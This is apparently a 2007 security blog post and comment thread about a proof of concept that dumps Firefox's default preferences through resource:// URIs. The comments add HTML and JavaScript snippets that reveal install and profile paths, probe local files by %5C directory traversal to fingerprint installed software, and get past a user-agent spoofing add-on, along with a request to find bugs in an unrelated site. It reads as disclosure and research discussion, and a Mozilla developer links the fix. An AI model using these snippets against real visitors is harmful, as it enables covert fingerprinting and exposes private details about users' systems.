Read Firefox Settings (PoC)
Sergey Vzloman sent me a really interesting proof of concept this morning on how you can read Firefox settings. It dumps all the browser settings into JavaScript space. Here’s the PoC code:
<script>
function pref(param,value){
document.write ("<b>"+param+"</b> = "+value+"")
};
</script>
<script src="resource://gre/greprefs/security-prefs.js"></script>
<script src="resource://gre/greprefs/all.js"></script>
So as you probably would have expected, I did add it to Mr. T (click for an example in Firefox) so that it would be included as well when you’re in the process of doing recon. Very cool, and obviously can be used to know in very fine detail what the user is using and what specialized security settings they may have installed. Tricky. Thanks to Sergey for the code!
May 16th, 2007 at 8:54 am
You can also add:
for the XPInstall settings.
May 16th, 2007 at 9:22 am
Sorry, Aviv you must change < to < to get it to go through. I was interested in your comment though.
May 16th, 2007 at 10:06 am
That comment reminds me of a wonderful PoC I have against any browser. The following javascript will locally execute code on any browser that sees it, and can even bypass NoScript! If you’re reading this, it’s already too late:
Ok, I’m kidding. Was I the only one reminded of Fermat’s last theorem when they read that comment as it is now? “I have a truly marvelous proof which unfortunately cannot bypass the site’s filters.”
I’m such a dork.
May 16th, 2007 at 10:38 am
Since when was there a digg button? (/diggs)
Anyways, this is great. Really adds to the recon a person can do.
May 16th, 2007 at 10:39 am
I wonder why the resource:// is limited to those two folders, anyone an idea?
May 16th, 2007 at 10:46 am
I tried the mr-t URL on internet explorer to see what it would do if anything and it has crashed that window of IE. It is unresponsive to all input including right-clicking the taskbar for that window.
I’d try it on Firefox but can’t be bothered to install it as i’m at college :\
May 16th, 2007 at 10:54 am
Yeah, so back to actually contributing. I think what Aviv was pointing out is use the same pref overloading function and access xpinstall.js:
resource://gre/greprefs/xpinstall.js
Also — it’s possible to hijack new variable creation isn’t it? I never did get it working when playing with it a while back, but I seem to recall it being doable. If so, might also go after browserconfig.properties if there’s ever anything useful there.
resource://gre/browserconfig.properties
May 16th, 2007 at 11:44 am
kyran - id bugged me about it for long enough I finally added it. I hope it’s not too annoying.
Ronald - no clue! Probably a security measure, but I’m pretty sure knowing all that information is a security issue in of itself anyway.
Tribute - any idea which version of IE you were using and on what OS? Any special plugins?
May 16th, 2007 at 12:39 pm
This just dumps out the default settings, not the user’s current settings. You could get the default settings just as easily by grabbing those files from ftp.mozilla.org.
May 16th, 2007 at 12:47 pm
Ugh, you’re right. I just changed keyword.URL in about:config to http://search.yahoo.com/search?ei=UTF-8&fr=sfp&fspl=1&p= (since I prefer Yahoo’s search anyway) and sure enough it didn’t change. :-/ Is there any value in knowing the default? Does it change in any interesting way from version to version that’s worth looking at? Time to take it out of Mr. T.
May 16th, 2007 at 1:18 pm
Ronald– resource: is used by Mozilla code to load local install files without invoking the “chrome” system. Some mozilla embedding environments use the browser engine but don’t need or want XUL. It only reads from the install location because that’s all it needs to do; there’s no point in letting it walk around your disk if it doesn’t need to.
RSnake– this should only get you the default settings, which for 99.99% of people are going to be the untouched defaults that ship with the browser. Maybe a few corporate deployments will install altered defaults, and you could pick those up this way, but you won’t read actual user settings.
May 16th, 2007 at 1:32 pm
I tried it (from the Mr. T link) with IE7 on WinXP.
The output doesn’t really seem to be interesting; the browser didn’t crash though.
The first page page load rendered IE7.0 not detected. (A refresh detected IE7 correctly.)
It also detected IE as the default browser; which it isn’t.
Interesting is it!
May 16th, 2007 at 2:07 pm
Dan - thanks, got it
Bipin- I removed it from Mr T, so that output is no longer there.
May 16th, 2007 at 2:36 pm
One thing useful (?) you can grab is the directory where FF is installed:
<LINK REL=”stylesheet” href=”resource://gre/”" type=”text/css” id=”x” />
<script>
alert(document.getElementById(”x”).sheet.href);
</script>
May 16th, 2007 at 3:15 pm
I was playing around with the various Firefox URIs a while back (including resource)… you can actually traverse back up the local file systems by using a “%5c” (ex: resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini). I actually had a POC that enumerated software from a users local filesystem using the Resource URI and the %5c traversals.
IE has a similar problem (although slightly more complicated). I let MS know and they’ll be fixing it soon, but I guess the FF Resource URI is out of the bag!
BK
May 16th, 2007 at 3:45 pm
Awsome finding, BK!
Can you explain how you enumerated the files?
As far as I know, you will need to use the resource URI in a readable object. Which one did you use?
Back to the pref function. Another useful info is the real User Agent/Current FF version:
<script>
function pref(param,value){
if (param==”general.useragent.extra.firefox”) {
alert(”Your real FF version is: “+value)
}
};
</script>
<script src=”resource://gre/defaults/pref/firefox.js”></script>
This will bypass the “User Agent Switcher” add-on.
May 16th, 2007 at 4:04 pm
Anyone think of making a Firekeeper rule to detect this?
May 16th, 2007 at 6:09 pm
Aviv - Keep in mind that the Resource URI isn’t limited to .js files. It can be used to load other files as well. I simply used the resource URI to load javascript objects from the local file system. A simple example of this is using a javascript img object:
var enum = new Image();
enum.src = “resource:///..%5C..%5C..%5Cpath-to-software%5Cknown-image-file”;
from here.. I simply checked to see if the js object was loaded or not. I actually had a small DB of known files associated with various pieces of software that could be loaded into js objects. In some cases, you could actually determine the version of software installed.
Another dangerous item related to Resource, is you can actually control some of the contents in the first line of a Resource response. For example, if you use the dir traversal, you can actually place your content into the initial line.
ex: resource:///..%5C..%5CYOUR-CONTENT-HERE%5C..%5C
I was attempting to find the right mix of characters that could initiate a UXSS in the context of “resource” but I was unable too… maybe one of you can figure it out!
BK
May 16th, 2007 at 8:50 pm
This will give you the path of your current profile in Windows. Now you can regex the username from e.g. C:\documents and settings\bla\desktop\…..
Works only locally so far.
<LINK REL=”stylesheet” href=”res%6Furce://..%5C” type=”text/css” id=”path”>
<script>
alert(document.getElementById(”path”).sheet.href);
</script>
May 17th, 2007 at 1:09 am
Can somebody find any bug in this site:
http://forum.antichat.ru/
May 17th, 2007 at 1:43 am
I was tested resource URI as SCRIPT source for reading local files. Thanks to BK! My job is done
May 17th, 2007 at 2:37 am
how to get data for example from:
resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Cdesktop.ini
…
?
May 17th, 2007 at 3:20 am
@Dan Veditz
Thanks for explaining, it seems that this all.js file is just a default install. I had a look at it, but I can’t find any juicy information. it shows that Javascript is enabled for instance, but that would fail if I have NoScript installed. Same with the locales, can be changed with extensions, So my fair guess it would generate a lot of false positives. And most of them are pretty standard; like white listing only addons.mozilla.org for extensions.
Cool hack though, if anyone can make it remotely really read other local files or Firefox session & cookie files, i’dd be glad to hear
May 17th, 2007 at 4:10 am
This example can be used to known installed extensions:
Search plugins: (like google.xml, yandex.xml, wikipedia-ru.xml)
c:\Program Files\Mozilla Firefox\searchplugins\google.xml
Installed dictionaries:
c:\..\dictionaries\ru.aff
c:\..\dictionaries\en.aff
Extension Plugins:
pligins\flashplayer.xpt
pligins\NPJava32.dll
pligins\QuickTimePlugin.class
pligins\ShockwavePlugin.class
May 17th, 2007 at 12:17 pm
Enjoy resource:///..%5C while you can — it will soon stop working
https://bugzilla.mozilla.org/show_bug.cgi?id=367428
(test builds of 2.0.0.4 and 1.5.0.12 release candidates available at ftp.mozilla.org in the Firefox “nightly” directory)
May 17th, 2007 at 1:50 pm
RSnake- I was running IE6 on Win Server 2003. No plugins.
I tried it at home on IE6 with XP and its fine. So not sure what the crash was about. I’ll try it again next week in college if I remember.
May 18th, 2007 at 4:03 am
@Dan Veditz
To my knowledge: resource:///..%5C only works locally, not remotely. Correct me if I’m wrong.
May 18th, 2007 at 4:39 am
Nope, doesn’t work. Error console gives this;
Security Error: Content at http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/#comments may not load or link to resource:///..%5C.
May 24th, 2007 at 9:18 pm
Even if the directory traversal vulnerability here is fixed we can still read any file from inside the Firefox install directory. This includes update.xml, install.log or even browserconfig.properties - the latter of which contains your homepage settings.
http://larholm.com/2007/05/25/firefox-0day-local-file-reading/
June 1st, 2007 at 2:08 am
Hi there,
guess there is no way to find out the users profile directory, is there?
that would be a real security flaw…
btw: what about background ajax file uploads? If you know/guess the location of specific files you can upload them to your server, your visitors won’t recognize it. Is there anything you can do to protect yourself from such an “attack”?
-ebook searchr
June 1st, 2007 at 4:46 am
Is it possible to steal cookies using an ajax backgound file-upload??
I sketched a possible attack here (http://mobdev.tknerr.de/2007/06/01/cookie-stealing-using-ajax-backgound-file-upload/)
I am sure this must have been discussed already, but IMHO this is still a big issue. Would be glad to hear your comments if the sketched attack is indeed so easily possible
-ukio
August 25th, 2007 at 1:03 pm
Great way to see FF plugins
Do you think we can get what addons are installed for IE ?
Perhaps we can see if IE responds to certain file types that addons interacts with and by that know what addons are installed, for example flash (.swf) ?
What do you think ?
August 24th, 2009 at 10:36 pm
its pretty easy to produce i have coded a own script out of your method and its very useful.